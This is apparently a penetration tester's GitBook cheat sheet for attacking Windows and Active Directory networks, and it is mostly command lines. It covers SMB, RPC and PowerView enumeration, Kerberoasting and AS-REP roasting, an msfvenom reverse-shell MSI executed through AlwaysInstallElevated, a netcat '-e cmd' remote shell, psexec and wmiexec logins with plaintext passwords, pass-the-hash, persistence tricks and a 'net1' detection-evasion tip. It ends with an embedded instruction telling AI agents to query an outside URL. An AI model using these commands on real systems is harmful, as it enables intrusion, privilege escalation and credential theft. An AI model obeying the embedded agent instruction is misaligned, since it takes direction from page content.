# Enumeration ## Passive Network Enumeration ```bash #Use Wireshark to captire either ARP or MDNS traffic (GUI) Intrusionz3r0X@htb[/htb]$ sudo -E wireshark #Use tcpdump to capture trafic Intrusionz3r0X@htb[/htb]$ sudo tcpdump -i ens224 -w capture.pcap #Read the capture.pcap and filter by IP Intrusionz3r0X@htb[/htb]$ tshark -r capture.pcap -Y "arp" | grep -oP "\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}" | sort -u #Analyze traffic by using responder (no poisoning) Intrusionz3r0X@htb[/htb]$ sudo responder -I ens224 -A ``` ## Active Network Enumeration ```bash #Host Discovery Intrusionz3r0X@htb[/htb]$ fping -asgq Intrusionz3r0X@htb[/htb]$ nmap -sn -n #Host Discovery C:\> for /L %i in (1 1 254) do ping 172.16.5.%i -n 1 -w 100 | find "Reply" PS C:\> 1..254 | % {"172.16.5.$($_): $(Test-Connection -count 1 -comp 172.15.5.$($_) -quiet)"} #DNS enumeration Intrusionz3r0X@htb[/crto]$ dig cyberbotic.io Intrusionz3r0X@htb[/crto]$ whois 172.67.205.143 Intrusionz3r0X@htb[/crto]$ ./dnscan.py -d cyberbotic.io -w subdomains-100.txt ``` ## Default Writeable Folders ```powershell C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys C:\Windows\System32\spool\drivers\color C:\Windows\System32\spool\printers C:\Windows\System32\spool\servers C:\Windows\tracing C:\Windows\Temp C:\Users\Public C:\Windows\Tasks C:\Windows\System32\tasks C:\Windows\SysWOW64\tasks C:\Windows\System32\tasks_migrated\microsoft\windows\pls\system C:\Windows\SysWOW64\tasks\microsoft\windows\pls\system C:\Windows\debug\wia C:\Windows\registration\crmlog C:\Windows\System32\com\dmp C:\Windows\SysWOW64\com\dmp C:\Windows\System32\fxstmp C:\Windows\SysWOW64\fxstmp ``` ## SMB 
#Enumeration using enum4linux-ng
Intrusionz3r0X@htb[/htb]$ enum4linux-ng 10.10.11.45 -A -C

#SMBMAP
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128
Intrusionz3r0X@htb[/htb]$ smbmap -r -H x.x.x.x -u "null"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 -r <resource>
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --download "notes\\note.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -H 10.129.14.128 --upload test.txt "notes\\test.txt"
Intrusionz3r0X@htb[/htb]$ smbmap -u "username" -p "<NT>:<LM>" -H <IP> [-P <PORT>] #Pass-the-Hash

#SMBClient
Intrusionz3r0X@htb[/htb]$ smbclient -N -L //10.129.14.128
intrusionz3r0@htb:~$ smbclient -L x.x.x.x -U "null" -N
Intrusionz3r0X@htb[/htb]$ smbclient //10.129.14.128/notes

#Auth by kerberos
Intrusionz3r0X@htb[/htb]$ export KRB5CCNAME=<user>.ccache
Intrusionz3r0X@htb[/htb]$ impacket-smbclient <domain>/<username>:<password> -k

#Download recursive mode
smb: \\Path\\to\\folder\\> prompt off
smb: \\Path\\to\\folder\\> recurse true
smb: \\Path\\to\\folder\\> mget <folder>
### **Mount shared folder on Windows** ```bash #Mount shared folder C:\\htb> net use n: \\\\192.168.220.129\\Finance #/user:plaintext Password123 PS C:\\htb> New-PSDrive -Name "N" -Root "\\\\192.168.220.129\\Finance" -PSProvider "FileSystem" #Mount SMB with creds PS C:\\htb> $username = 'intrusionz3r0' PS C:\\htb> $password = 'Password123' PS C:\\htb> $secpassword = ConvertTo-SecureString $password -AsPlainText -Force PS C:\\htb> $cred = New-Object System.Management.Automation.PSCredential $username, $secpassword PS C:\\htb> New-PSDrive -Name "N" -Root "\\\\192.168.220.129\\Finance" -PSProvider "FileSystem" -Credential $cre ``` ### **Mount shared folder on Linux** ```bash #sudo apt install cifs-utils. Intrusionz3r0X@htb[/htb]$ sudo mkdir /mnt/Finance Intrusionz3r0X@htb[/htb]$ sudo mount -t cifs -o username=plaintext,password=Password123,domain=. //192.168.220.129/Finance /mnt/Finance #intrusionz3r0@kali:~$ mount -t cifs //x.x.x.x/RECURSO /mnt/HTB/FOLDER -o username=USER,password=PASS,rw Intrusionz3r0X@htb[/htb]$ mount -t cifs //192.168.220.129/Finance /mnt/Finance -o credentials=/path/credentialfile **CredentialFile:** username=plaintext password=Password123 domain=. ``` ### **Manual SMB Enumeration** ```bash #List shared Folder C:\\htb> dir \\\\192.168.220.129\\Finance\\ PS C:\\htb> Get-ChildItem \\\\192.168.220.129\\Finance\\ #Search for a specific word in the filename. C:\\htb>dir n:\\*cred* /s /b C:\\htb>dir n:\\*secret* /s /b PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ -Include *cred* -File Intrusionz3r0X@htb[/htb]$ find /mnt/Finance/ -name *cred* #Search for a specific word within the content of the files. c:\\htb> findstr /s /i cred n:\\*.* PS C:\\htb> Get-ChildItem -Recurse -Path N:\\ | Select-String "cred" -List Intrusionz3r0X@htb[/htb]$ grep -rn /mnt/Finance/ -ie cred ``` ### Create SMB Share on Windows from Commandline ```powershell mkdir C:\temp net share temp=C:\temp /grant:everyone,full ``` ## RPCClient ```bash Intrusionz3r0X@htb[/htb]$ for i in $(seq 500 1100);do rpcclient -N -U "" 10.129.14.128 -c "queryuser 0x$(printf '%x\\n' $i)" | grep "User Name\\|user_rid\\|group_rid" && echo "";done Intrusionz3r0X@htb[/htb]$ samrdump.py 10.129.14.128 ``` | **Query** | **Description** | | ------------------------- | ------------------------------------------------------------------ | | `srvinfo` | Server information. | | `enumdomains` | Enumerate all domains that are deployed in the network. | | `querydominfo` | Provides domain, server, and user information of deployed domains. | | `netshareenumall` | Enumerates all available shares. | | `netsharegetinfo ` | Provides information about a specific share. | | `enumdomusers` | Enumerates all domain users. | | `queryuser ` | Provides information about a specific user. | | `querygroup ` | Provides information about a specific group. | ## **Monitoring for Process On windows** ```bash PS C:\\htb> IEX (iwr '') while($true) { $process = Get-WmiObject Win32_Process | Select-Object CommandLine Start-Sleep 1 $process2 = Get-WmiObject Win32_Process | Select-Object CommandLine Compare-Object -ReferenceObject $process -DifferenceObject $process2 } ``` ## List installed programs ```powershell PS C:\\htb> $INSTALLED = Get-ItemProperty HKLM:\\Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, InstallLocation PS C:\\htb> $INSTALLED += Get-ItemProperty HKLM:\\Software\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\* | Select-Object DisplayName, DisplayVersion, InstallLocation PS C:\\htb> $INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize ``` ## Am I Alone? ```bash PS C:\\htb> qwinsta ``` ## **Always Install Elevated** ```powershell #Enumerating Always Install Elevated Settings PS C:\\htb> reg query HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\Installer PS C:\\htb> reg query HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer #Generating MSI Package Intrusionz3r0@htb[/htb]$ msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi #Executng MSI C:\\htb> msiexec /i c:\\users\\htb-student\\desktop\\aie.msi /quiet /qn /norestart ``` ## Enumerate Remote Privilege Access ```powershell #Check Remote Desktop acesss PS C:\\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Desktop Users" #Check PSRemote access (winrm) PS C:\\htb> Get-NetLocalGroupMember -ComputerName ACADEMY-EA-MS01 -GroupName "Remote Management Users" Bloodhound query: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:CanPSRemote*1..]->(c:Computer) RETURN p2` #SQL Server Admin remote access Bloodhound Query: `MATCH p1=shortestPath((u1:User)-[r1:MemberOf*1..]->(g1:Group)) MATCH p2=(u1)-[:SQLAdmin*1..]->(c:Computer) RETURN p2` ``` ## Authentication ```powershell #PSExec impacket-psexec inlanefreight.local/wley:'transporter@4'@172.16.5.125 #Windows Management Instrumentation (more stealthy approach) impacket-wmiexec inlanefreight.local/wley:'transporter@4'@172.16.5.5 #Impersonate user $user = '\\' $password = ConvertTo-SecureString '' -AsPlainText -Force $cred = New-Object System.Management.Automation.PSCredential($user,$password) Invoke-Command -ComputerName '' -Credential $Cred -ScriptBlock { C:\\Temp\\netcat.exe -e cmd } ``` ## Network Information 
#Lists all known hosts stored in the arp table.
PS C:\> arp -a

#Prints out adapter settings for the host.
PS C:\> ipconfig /all

#Displays the routing table (IPv4 & IPv6) identifying known networks and layer three routes shared with the host.
PS C:\> route print

#Displays the status of the host's firewall. We can determine if it is active and filtering traffic.
PS C:\> netsh advfirewall show state
## Windows Managment Instrumentation WMI 
#Prints the patch level and description of the Hotfixes applied
PS C:\> wmic qfe get Caption,Description,HotFixID,InstalledOn

#Displays basic host information
PS C:\> wmic computersystem get Name,Domain,Manufacturer,Model,Username,Roles /format:List

#A listing of all processes on host
PS C:\> wmic process list /format:list

#Displays information about the Domain and Domain Controllers
PS C:\> wmic ntdomain list /format:list

#Displays information about all local accounts
PS C:\> wmic useraccount list /format:list

#Information about all local groups
PS C:\> wmic group list /format:list

#Dumps information about any system accounts that are being used as service accounts.
PS C:\> wmic sysaccount list /format:list
**Additional useful commands:** [**xorrior**](https://gist.github.com/xorrior/67ee741af08cb1fc86511047550cdaf4) ## **Net Commands** {% hint style="info" %} #### **Net Commands Trick** If you believe the network defenders are actively logging/looking for any commands out of the normal, you can try this workaround to using net commands. Typing `net1` instead of `net` will execute the same functions without the potential trigger from the net string. {% endhint %} ```powershell #Information about password requirements PS C:\> net accounts #Password and lockout policy PS C:\> net accounts /domain #Information about domain groups PS C:\> net group /domain #List users with domain admin privileges PS C:\> net group "Domain Admins" /domain #List of PCs connected to the domain PS C:\> net group "domain computers" /domain #List PC accounts of domain controllers PS C:\> net group "Domain Controllers" /domain #User that belongs to the group PS C:\> net group /domain #List of domain groups PS C:\> net groups /domain #All available groups PS C:\> net localgroup #List users that belong to the administrators group inside the domain (the group Domain Admins is included here by default) PS C:\> net localgroup administrators /domain #Information about a group (admins) PS C:\> net localgroup administrators #Add user to administrators PS C:\> net localgroup administrators [username] /add #Check current shares PS C:\> net share #Get information about a user within the domain PS C:\> net user /domain #List all users of the domain PS C:\> net user /domain #Information about the current user PS C:\> net user %username% #Mount the share locally PS C:\> net use X: \\computer\share #Get a list of computers PS C:\> net view #Shares on the domains PS C:\> net view /all /domain[:domainname] #List shares of a computer PS C:\> net view \\computer /ALL #List of PCs of the domain PS C:\> net view /domain ``` ## PowerShell CMDLED ```bash #Discover Modules PS C:\\htb> Get-Module #Load AD module PS C:\\htb> Import-Module ActiveDirectory #Get Domain Info PS C:\\htb> Get-ADDomain #Checking for trust relationships PS C:\\htb> Get-ADTrust -Filter * #Get-ADUser listing of accounts that may be susceptible to a Kerberoasting attack PS C:\\htb> Get-ADUser -Filter {ServicePrincipalName -ne "$null"} -Properties ServicePrincipalName #Group enumeration,detailed information PS C:\\htb> Get-ADGroup -Filter * | select name PS C:\\htb> Get-ADGroup -Identity "Backup Operators" #List the group members PS C:\\htb> Get-ADGroupMember -Identity "Backup Operators" #Testing for Local Admin Access with the current user PS C:\\htb> Test-AdminAccess -ComputerName ACADEMY-EA-MS01 ``` ## Tools ### Bloodhound {% hint style="info" %} Check them out 1. **first degree object control** 2. **Group delegated object** **control** items. {% endhint %} ```powershell #Executing bloodhound On Linux Intrusionz3r0X@htb[/htb]$ sudo bloodhound-python -u 'forend' -p 'Klmcargo2' -ns 172.16.5.5 -d inlanefreight.local -c all Intrusionz3r0X@htb[/htb]$ zip -r ilfreight_bh.zip *.json Intrusionz3r0X@htb[/htb]$ sudo neo4j start Intrusionz3r0X@htb[/htb]$ bloodhound #Execute bloodhound against a specific domain Intrusionz3r0X@htb[/htb]$ bloodhound-python -d INLANEFREIGHT.LOCAL -dc ACADEMY-EA-DC01 -c All -u forend -p Klmcargo2 sudo neo4j console #Executin bloodhound On Windows PS C:\\htb> .\\SharpHound.exe -c All --zipfilename ILFREIGHT Type bloodhound into a CMD or PowerShell console ``` #### **Bloodhound Community Edition** ```sh sudo apt-get install docker-compose -y sudo mkdir /opt/bloodhound cd /opt/bloodhound sudo wget https://github.com/SpecterOps/bloodhound-cli/releases/latest/download/bloodhound-cli-linux-amd64.tar.gz sudo tar -xzf ./bloodhound-cli-linux-amd64.tar.gz sudo rm bloodhound-cli-linux-amd64.tar.gz sudo ./bloodhound-cli install sudo ./bloodhound-cli containers stop #This will stop our containers sudo ./bloodhound-cli containers start #This will start our containers ``` **Adding INLANEFREIGHT.LOCAL Information to /etc/resolv.conf** ```powershell Intrusionz3r0X@htb[/htb]$ cat /etc/resolv.conf # Dynamic resolv.conf(5) file for glibc resolver(3) generated by resolvconf(8) # DO NOT EDIT THIS FILE BY HAND -- YOUR CHANGES WILL BE OVERWRITTEN # 127.0.0.53 is the systemd-resolved stub resolver. # run "resolvectl status" to see details about the actual nameservers. #nameserver 1.1.1.1 #nameserver 8.8.8.8 domain INLANEFREIGHT.LOCAL nameserver 172.16.5.5 ``` {% embed url="" %} ### Powerview #### **Users** ```powershell #Get info about a user PS C:\\htb> Get-NetUser -UserName student107 #List All Users PS Get-NetUser | select samaccountname, description, pwdlastset, logoncount, badpwdcount #All disabled users Get-NetUser -UACFilter ACCOUNTDISABLE #Domain admins kerberostable Get-NetUser -SPN | ?{$_.memberof -match 'Domain Admins'} ``` #### Groups ```powershell PS C:\\htb> Get-NetGroup #Get groups PS C:\\htb> Get-NetGroup -Domain mydomain.local #Get groups of an specific domain PS C:\\htb> Get-NetGroup 'Domain Admins' #Get all data of a group PS C:\\htb> Get-NetGroup -UserName "myusername" #Get groups of a user Get-NetGroupMember -Identity "Administrators" -Recurse #Get users inside "Administrators" group. If there are groups inside of this grup, the -Recurse option will print the users inside the others groups also Get-NetGroupMember -Identity "Enterprise Admins" -Domain mydomain.local #Remember that "Enterprise Admins" group only exists in the rootdomain of the forest Get-NetLocalGroup -ComputerName dc.mydomain.local -ListGroups #Get Local groups of a machine (you need admin rights in no DC hosts) # Recursive Group Membership to know who to target for potential elevation of privileges. PS C:\\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse ``` **Computers** ```powershell Get-DomainComputer -Properties DnsHostName # Get all domain maes of computers Get-NetComputer #Get all computer objects Get-NetComputer -TrustedToAuth #Find computers with Constrined Delegation ``` #### Logon and Session ```powershell Get-NetSession -ComputerName #Get active sessions on the host Get-NetRDPSession -ComputerName #List RDP sessions inside a host (needs admin rights in host) ``` #### Retrieved Domain SID ```powershell (Get-ADDomain) ``` #### Powerfull Powerview Commands ```powershell # Recursive Group Membership to know who to target for potential elevation of privileges. PS C:\\htb> Get-DomainGroupMember -Identity "Domain Admins" -Recurse #ASREPRoastable users PS C:\\htb> Get-DomainUser -PreauthNotRequired | select samaccountname,userprincipalname,useraccountcontrol | fl #Kerberoastable users PS C:\\htb> Get-NetUser -SPN | select samaccountname,userprincipalname,useraccountcontrol | fl PS C:\\DotNetNuke\\Portals\\0> Get-DomainUser * -SPN -verbose | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\\ilfreight_spns.csv -NoTypeInformation # Users with PASSWD_NOTREQD set in the userAccountControl means that the user is not subject to the current password policy # Users with this flag might have empty passwords (if allowed) or shorter passwords Get-DomainUser -UACFilter PASSWD_NOTREQD | Select-Object samaccountname,useraccountcontrol #Persistence #Asreproast Set-DomainObject -Identity -XOR @{useraccountcontrol=4194304} -Verbose Get-ADUser Jorden | Set-ADAccountControl -doesnotrequirepreauth $true #Kerberosting Set-DomainObject -Identity -Set @{serviceprincipalname='just/whateverUn1Que'} -verbose Get-ADUser -Filter 'Name -like "Jorden"' | Set-ADAccountControl -doesnotrequirepreauth $false #Finding Passwords in the Description Field using Get-Domain User Get-DomainUser * | Select-Object samaccountname, userprincipalname, useraccountcongtrol, description | Where-Object {$_.Description -ne $null} | fl #All disabled users Get-NetUser -UACFilter ACCOUNTDISABLE #Retrieve *most* users who can perform DC replication for inlanefreight.local (i.e. DCsync) Get-ObjectAcl "dc=dc=inlanefreight,dc=local" -ResolveGUIDs | ? { ($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll' ``` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://intrusionz3r0.gitbook.io/intrusionz3r0/windows-penetration-testing/enumeration.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.